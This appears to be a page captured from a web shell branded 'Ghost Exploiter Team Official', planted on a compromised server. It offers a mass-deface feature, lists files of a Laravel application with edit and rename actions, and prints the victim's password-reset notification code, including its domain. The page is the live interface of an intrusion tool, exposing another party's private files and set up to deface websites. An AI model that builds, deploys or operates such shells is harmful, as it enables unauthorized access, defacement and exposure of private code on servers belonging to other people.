Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Console
/
Commands
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ArticleToGroup.php
0.453KB
edt
ren
BankService.php
0.231KB
edt
ren
CashFlowService.php
0KB
edt
ren
Dto.php
6.402KB
edt
ren
PaymentDistribution.php
1.127KB
edt
ren
ResetPasswordNotificati
...
1.28KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
debugbar.php
13.946KB
edt
ren
phpunit.xml
0KB
edt
ren
testExport-202601280453
...
0KB
edt
ren
testExport.php
1.15KB
edt
ren
<?php declare(strict_types=1); namespace App\Notifications; use Illuminate\Auth\Notifications\ResetPassword as BaseResetPassword; use Illuminate\Bus\Queueable; use Illuminate\Queue\SerializesModels; final class ResetPasswordNotification extends BaseResetPassword { use Queueable; use SerializesModels; private const DOMAIN = 'http://gitep.dev-top-it.ru'; public function toMail($notifiable): MailMessage { $url = $this->createUrl(notifiable: $notifiable); return (new \Illuminate\Notifications\Messages\MailMessage()) ->subject(subject: 'Сброс пароля') ->line(line: 'Вы получили это сообщение, потому что мы получили запрос на сброс пароля для вашей учетной записи.') ->action(text: 'Сбросить пароль', url: $url) ->line(line: 'Если вы не запрашивали сброс пароля, никаких дальнейших действий не требуется.'); } protected function createUrl($notifiable): string { return self::DOMAIN . '/password/set?token=' . $this->token . '&email=' . urlencode( string: $notifiable->getEmailForPasswordReset() ); } }